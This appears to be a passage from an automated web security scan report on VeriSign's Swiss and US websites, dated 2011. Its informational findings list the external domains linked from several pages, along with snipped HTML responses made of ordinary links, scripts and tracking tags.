...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport'>Managed PKI Support</a>
...[SNIP]...
</div>
   <a href="https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." width="170" height="183" /></a>
...[SNIP]...
<li><a href='https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'>VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href='https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'>VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'>Code Signing Portal for Microsoft Windows Mobile Sign In</a>
...[SNIP]...
<li><a href='https://products.verisign.com/geocenter/reseller/logon.do'>VeriSign Partner Center Sign In</a>
...[SNIP]...
<div class="buttondiv-ie"><a class="trybutton" href="https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH"><span>
...[SNIP]...
<div class="ab_cell"><a class="accelbtn" href="https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VRSN_CH"><span class="ab_buybtn">
...[SNIP]...
</a> <a href="https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VRSN_CH">VeriSign Trust Seal</a>
...[SNIP]...
<div class="ab_cell"><a class="accelbtn" href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"><span class="ab_signinbtn">
...[SNIP]...
</a> <a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">VeriSign Trust Center</a>
...[SNIP]...
<a href='/ssl/ssl-information-center/increase-traffic-conversion/index.html?tid=hp_promo' ><img src='http://cdn.verisign.com/authweb/global/assets/shared/images/shoppingcart.png' alt="VeriSign Trusted" height='84' /></a>
...[SNIP]...
<a href='/ssl/ssl-information-center/diginotar-breach-alert/index.html' ><img src='http://cdn.verisign.com/authweb/global/assets/shared/images/hp-promo-fingerprint.png' alt="SSL Security Breaking News." height='84' /></a>
...[SNIP]...
<a class='promo_img' href='/verisigninc' rel='external'><img src='http://cdn.verisign.com/authweb//en_ch/assets/home/images/verisign_inc_promo_home.png' alt='Discover the brand new look of Verisign - Domain Name Services, Network Intelligence and DNS Availability are now at http://www.verisigninc.com/en_CH/index.xhtml'></a>
...[SNIP]...
<li><a href='http://www.symantec.com/de/ch/about/news/release/index.jsp'>News</a></li><li><a href='//blogs.verisign.com/?tid=footer'>Blogs</a>
...[SNIP]...
<li><a href='//www.verisign.com/verisign-worldwide/index.html?tid=footer'>Worldwide Sites</a>
...[SNIP]...
<p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'>Symantec Corp.</a>
...[SNIP]...
</a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html'>two-factor authentication</a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html'>identity protection</a>
...[SNIP]...
</a> and <a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'>public key infrastructure</a> (<a href='//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html'>PKI</a>). Symantec products include <a href='http://ch.norton.com/'>Norton AntiVirus software</a>, <a href='http://smallbusiness.norton.com'>Norton Internet Security solutions for small business</a>, and <a href='http://www.pctools.com/de/'>PC Tools</a>
...[SNIP]...
</div>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"></script>
       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"></script>

                   <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"></script>
...[SNIP]...
</script>


       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/home/js/home.js?071211"></script>
       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js"></script>
...[SNIP]...

14.65. http://www.verisign.ch/contact-information/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/contact-information/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.verisign.ch/contact-information/index.html?tid=footer

The response contains the following links to other domains:

http://blogs.verisign.com/
http://blogs.verisign.com/?tid=footer
http://cdn.verisign.com/assets/shared/css/header.css
http://cdn.verisign.com/assets/shared/js/curvycorners.js
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png
http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css
http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico
http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911
http://ch.norton.com/
http://press.verisign.com/
http://smallbusiness.norton.com/
http://verisign.com/partnersupport/worldwide/partnersupport.html
http://www.addthis.com/bookmark.php?v=250
http://www.pctools.com/de/
http://www.symantec.com/
http://www.symantec.com/de/ch/about/news/release/index.jsp
http://www.verisign.co.jp/
http://www.verisign.co.nz/
http://www.verisign.co.uk/
http://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html
http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html
http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps
http://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to
http://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html
http://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps
http://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps
http://www.verisign.com.au/
http://www.verisign.com.br/
http://www.verisign.com.hk/
http://www.verisign.com.sg/
http://www.verisign.com.tw/
http://www.verisign.com/
http://www.verisign.com/ar/
http://www.verisign.com/ca/
http://www.verisign.com/cl/
http://www.verisign.com/latinamerica/esp/
http://www.verisign.com/mx/
http://www.verisign.com/nl/
http://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo
http://www.verisign.com/press/awards/index.html
http://www.verisign.com/support/ssl-certificates-support/secure-site-seal/abuse.html
http://www.verisign.com/verisign-worldwide/index.html
http://www.verisign.com/verisign-worldwide/index.html?tid=footer
http://www.verisignchina.com.cn/
http://www.verisigninc.com/en_CH/index.xhtml?loc=en_CH
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport
https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport
https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo
https://knowledge.verisign.ch/support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601
https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport
https://press.verisign.com/easyir/customrel.do?easyirid=AFC0FF0DB5C560D3&version=live&prid=458311&releasejsp=custom_97
https://products.verisign.com/geocenter/reseller/logon.do
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en
https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://www.verisign.com/cgi-bin/go.cgi?a=w18450112575241018

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 39107

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="/assets/corp/css/corp_generic_st
...[SNIP]...

       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       

<script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"></script>
...[SNIP]...

14.66. http://www.verisign.ch/corporate/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/corporate/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.verisign.ch/corporate/index.html?tid=footer

The response contains the following links to other domains:

http://blogs.verisign.com/
http://blogs.verisign.com/?tid=footer
http://cdn.verisign.com/assets/shared/css/header.css
http://cdn.verisign.com/assets/shared/js/curvycorners.js
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png
http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css
http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico
http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911
http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/seal.js
http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
http://ch.norton.com/
http://investor.symantec.com/phoenix.zhtml?c=89422&p=irol-EventDetails&EventId=3096751
http://investor.symantec.com/phoenix.zhtml?c=89422&p=irol-irhomeNews
http://player.ooyala.com/player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent
http://player.ooyala.com/player.swf?embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&version=2
http://press.verisign.com/
http://smallbusiness.norton.com/
http://twitter.com/verisign
http://verisign.com/partnersupport/worldwide/partnersupport.html
http://www.addthis.com/bookmark.php?v=250
http://www.facebook.com/VeriSignAuthentication
http://www.pctools.com/de/
http://www.symantec.com/
http://www.symantec.com/about/careers/index.jsp
http://www.symantec.com/about/news/release/article.jsp?prid=20100809_01
http://www.symantec.com/business/theme.jsp?themeid=vs
http://www.symantec.com/content/en/us/enterprise/other_resources/b-verisign_faq.pdf
http://www.symantec.com/de/ch/about/news/release/index.jsp
http://www.verisign.co.jp/
http://www.verisign.co.nz/
http://www.verisign.co.uk/
http://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html
http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html
http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps
http://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to
http://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html
http://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps
http://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps
http://www.verisign.com.au/
http://www.verisign.com.br/
http://www.verisign.com.hk/
http://www.verisign.com.sg/
http://www.verisign.com.tw/
http://www.verisign.com/
http://www.verisign.com/ar/
http://www.verisign.com/ca/
http://www.verisign.com/cl/
http://www.verisign.com/hp07/j/swfobj.js
http://www.verisign.com/latinamerica/esp/
http://www.verisign.com/mx/
http://www.verisign.com/nl/
http://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo
http://www.verisign.com/press/awards/index.html
http://www.verisign.com/verisign-worldwide/index.html
http://www.verisign.com/verisign-worldwide/index.html?tid=footer
http://www.verisignchina.com.cn/
http://www.verisigninc.com/en_CH/index.xhtml?loc=en_CH
http://www.youtube.com/verisignauth
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab
https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport
https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport
https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo
https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport
https://products.verisign.com/geocenter/reseller/logon.do
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en
https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://www4.symantec.com/events/controller?c=listing

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 36193

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" language="JavaScript"></script>

<script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/seal.js" language="JavaScript"></script>

<script type="text/JavaScript" src="//www.verisign.com/hp07/j/swfobj.js">

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...

       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       

<script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"></script>
...[SNIP]...

14.67. http://www.verisign.ch/trust-seal/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/trust-seal/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.verisign.ch/trust-seal/index.html?tid=gnps

The response contains the following links to other domains:

http://blogs.verisign.com/?tid=footer
http://cdn.verisign.com/assets/shared/css/header.css
http://cdn.verisign.com/assets/shared/js/curvycorners.js
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg
http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png
http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css
http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico
http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911
http://cdn.verisign.com/stellent/fragments/www_chatNow/zig.js
http://ch.norton.com/
http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab
http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent
http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2
http://smallbusiness.norton.com/
http://verisign.com/partnersupport/worldwide/partnersupport.html
http://view.atdmt.com/iaction/slctsl_2010Q2TrustSeal_1
http://www.addthis.com/bookmark.php?v=250
http://www.facebook.com/VeriSignAuthentication
http://www.pctools.com/de/
http://www.symantec.com/
http://www.symantec.com/de/ch/about/news/release/index.jsp
http://www.twitter.com/TrustSeal
http://www.verisign.co.jp/
http://www.verisign.co.nz/
http://www.verisign.co.uk/
http://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html
http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html
http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps
http://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to
http://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html
http://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps
http://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps
http://www.verisign.com.au/
http://www.verisign.com.br/
http://www.verisign.com.hk/
http://www.verisign.com.sg/
http://www.verisign.com.tw/
http://www.verisign.com/
http://www.verisign.com/ar/
http://www.verisign.com/ca/
http://www.verisign.com/cl/
http://www.verisign.com/latinamerica/esp/
http://www.verisign.com/mx/
http://www.verisign.com/nl/
http://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo
http://www.verisign.com/stellent/fragments/vrsncssassets/vrsnStyles.css
http://www.verisign.com/trust-seal/resources/case-studies/billtiger/index.html
http://www.verisign.com/trust-seal/resources/case-studies/globalvillage/index.html
http://www.verisign.com/trust-seal/resources/case-studies/myenergysolution/index.html
http://www.verisign.com/trust-seal/resources/case-studies/trademark-company/index.html
http://www.verisign.com/verisign-worldwide/index.html?tid=footer
http://www.verisignchina.com.cn/
http://www.youtube.com/user/VeriSignAuth
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport
https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport
https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo
https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport
https://products.verisign.com/geocenter/reseller/logon.do
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en
https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial?application_locale=VRSN_CH
https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://trust-center.verisign.ch/process/retail/console_login?application_locale=VTC_CH
https://trust-center.verisign.ch/process/retail/trust_initial?application_locale=VRSN_CH
https://www.verisign.com/cgi-bin/go.cgi?a=w18550112675251018
https://www.verisign.com/js/mbox.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 50059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>VeriSign Trust Seal - Perfec
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<link rel="stylesheet" href="//www.verisign.com/stellent/fragments/vrsncssassets/vrsnStyles.css" type="text/css" />
<link rel="stylesheet" href="/assets/partners/css/styles.css" type="text/css" />
...[SNIP]...
</script>

<script type="text/JavaScript" src="https://www.verisign.com/js/mbox.js"></script>
...[SNIP]...
<noscript><iframe src="//view.atdmt.com/iaction/slctsl_2010Q2TrustSeal_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       

<script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"></script>
...[SNIP]...

<script type="text/JavaScript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js">
</script>
...[SNIP]...

<script type="text/JavaScript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js">
</script>
...[SNIP]...

14.68. http://www.verisign.com/code-signing/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/code-signing/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.verisign.com/code-signing/index.html?tid=a_box

The response contains the following links to other domains:

http://forums.sun.com/index.jspa
http://msdn.microsoft.com/en-us/library/aa141471.aspx
http://smallbusiness.norton.com/?inid=soho_verisign_footer
http://us.norton.com/index.jsp
http://www.addthis.com/bookmark.php?v=250
http://www.addthis.com/bookmark.php?v=250&username=verisign
http://www.adobe.com/devnet/air/
http://www.adobe.com/support/director/downloads.html
http://www.geotrust.com/geocenter/customer-login/
http://www.pctools.com/
http://www.symantec.com/
http://www.symantec.com/about/news/release/index.jsp?tid=footer
http://www.symantec.com/business/theme.jsp?themeid=contact-verisign
http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products
http://www.symantec.com/connect/blogs/symantec-wins-code-project-s-2011-members-choice-award-authentication-tools-verisign-code-sign
http://www.verisign.be/
http://www.verisign.ch/
http://www.verisign.de/
http://www.verisign.dk/
http://www.verisign.es/
http://www.verisign.fr/
http://www.verisign.in/
http://www.verisign.it/
http://www.verisign.se/
http://www.verisignchina.com.cn/
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
https://products.geotrust.com/signup/codesign.do?partner=geotrust.cs.geotrust
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
https://www.googleadservices.com/pagead/conversion.js
https://www.googleadservices.com/pagead/conversion/1072569688/?label=TRqGCKHUsQIQ2Lq4_wM&guid=ON&script=0

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:27:08 GMT
Content-Type: text/html
Content-Length: 103179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <!--HEADER ASSETS
...[SNIP]...
<li><a href='//www.verisign.be/'>Belgium</a>
...[SNIP]...
<li><a href='//www.verisignchina.com.cn/'>China</a>
...[SNIP]...
<li><a href='//www.verisign.dk/'>Denmark</a>
...[SNIP]...
<li><a href='//www.verisign.fr/'>France</a>
...[SNIP]...
<li><a href='//www.verisign.de/'>Germany</a>
...[SNIP]...
<li><a href='//www.verisign.in/'>India</a>
...[SNIP]...
<li><a href='//www.verisign.it/'>Italy</a>
...[SNIP]...
<li><a href='//www.verisign.es/'>Spain</a>
...[SNIP]...
<li><a href='//www.verisign.se/'>Sweden</a>
...[SNIP]...
<li><a href='//www.verisign.ch/'>Switzerland</a>
...[SNIP]...
<li><a href="http://www.symantec.com/business/theme.jsp?themeid=contact-verisign">Contact VeriSign</a>
...[SNIP]...
<noscript>
                           <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100">
                               <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.com&lang=en">
...[SNIP]...
<li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'>Code Signing Portal for Microsoft Windows Mobile Sign In</a>
...[SNIP]...
<div class="emailPrint" id="emailPrint">
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
<a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"><img alt="Email" title="Email" src="http://cdn.verisign.com/assets/shared/images/dev044079.gif"/>
...[SNIP]...
<img src="http://cdn.verisign.com/assets/shared/images/dev044080.gif"/><a href="//www.addthis.com/bookmark.php?v=250&username=verisign" class="addthis_button" addthis:ui_click="true"><img alt="Share" title="Share" src="http://cdn.verisign.com/assets/shared/images/dev044077.gif"/>
...[SNIP]...
</a>
or to <a href="http://forums.sun.com/index.jspa">Sun Forums</a>
...[SNIP]...
</a>
or to <a href="http://msdn.microsoft.com/en-us/library/aa141471.aspx">msdn Office Developer Center</a>
...[SNIP]...
</a>
Support or
to <a href="http://www.adobe.com/devnet/air/">Adobe AIR Developer Center</a>
...[SNIP]...
<p class="buy">
<a href="https://products.geotrust.com/signup/codesign.do?partner=geotrust.cs.geotrust">BUY NOW</a>
...[SNIP]...
<p class="renew">
<a href="http://www.geotrust.com/geocenter/customer-login/">SIGN IN</a>
...[SNIP]...
</a>
or to <a href="http://www.adobe.com/support/director/downloads.html">Director Support Center</a>
...[SNIP]...
</div>
<a href="http://www.symantec.com/connect/blogs/symantec-wins-code-project-s-2011-members-choice-award-authentication-tools-verisign-code-sign "><span id="awardBox" class="bottomBoxes">
...[SNIP]...
<li><a href='http://www.symantec.com/business/theme.jsp?themeid=contact-verisign'>Contact VeriSign</a>
...[SNIP]...
<li><a href='http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products'>About VeriSign</a>
...[SNIP]...
<li><a href='http://www.symantec.com/about/news/release/index.jsp?tid=footer'>News</a>
...[SNIP]...
<p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'>Symantec Corp.</a>
...[SNIP]...
</a>). Symantec products include <a href='//us.norton.com/index.jsp'>Norton antivirus software</a>, <a href='http://smallbusiness.norton.com?inid=soho_verisign_footer'>Norton internet security solutions for small business</a>, and <a href='http://www.pctools.com'>PC Tools</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
   </script>
...[SNIP]...
<div style="display:inline;">
   <img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1072569688/?label=TRqGCKHUsQIQ2Lq4_wM&guid=ON&script=0"/>
   </div>
...[SNIP]...

14.69. http://www.verisign.com/trust-seal/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/trust-seal/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.verisign.com/trust-seal/index.html?tid=gnps

The response contains the following links to other domains:

http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab
http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent
http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2
http://smallbusiness.norton.com/?inid=soho_verisign_footer
http://us.norton.com/index.jsp
http://view.atdmt.com/iaction/slctsl_2010Q2TrustSeal_1
http://www.addthis.com/bookmark.php?v=250
http://www.addthis.com/bookmark.php?v=250&username=verisign
http://www.facebook.com/VeriSignAuthentication
http://www.pctools.com/
http://www.symantec.com/
http://www.symantec.com/about/news/release/index.jsp?tid=footer
http://www.symantec.com/business/theme.jsp?themeid=contact-verisign
http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products
http://www.twitter.com/TrustSeal
http://www.verisign.be/
http://www.verisign.ch/
http://www.verisign.de/
http://www.verisign.dk/
http://www.verisign.es/
http://www.verisign.fr/
http://www.verisign.in/
http://www.verisign.it/
http://www.verisign.se/
http://www.verisignchina.com.cn/
http://www.youtube.com/user/VeriSignAuth
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:26:13 GMT
Content-Type: text/html
Content-Length: 49851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="X-UA-Comp
...[SNIP]...
<noscript>
